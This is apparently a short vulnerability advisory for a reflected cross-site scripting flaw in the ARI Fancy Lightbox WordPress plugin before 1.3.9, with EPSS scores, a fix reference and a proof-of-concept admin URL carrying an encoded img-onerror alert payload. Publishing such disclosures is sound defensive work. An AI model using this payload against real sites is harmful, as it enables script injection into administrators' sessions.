ARI Fancy Lightbox < 1.3.9 - Reflected Cross-Site Scripting

2022-02-1700:00:00

Krzysztof Zając

100

0.001 Low

EPSS

Percentile

30.2%

The plugin does not sanitise and escape the msg parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting

https://example.com/wp-admin/admin.php?page=ari-fancy-lightbox&msg=%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E

References

plugins.trac.wordpress.org/changeset/2680993

0.001 Low

EPSS

Percentile

30.2%

Related for WPEX-ID:6B37FA17-0DCB-47A7-B1EB-F9F6ABB458C0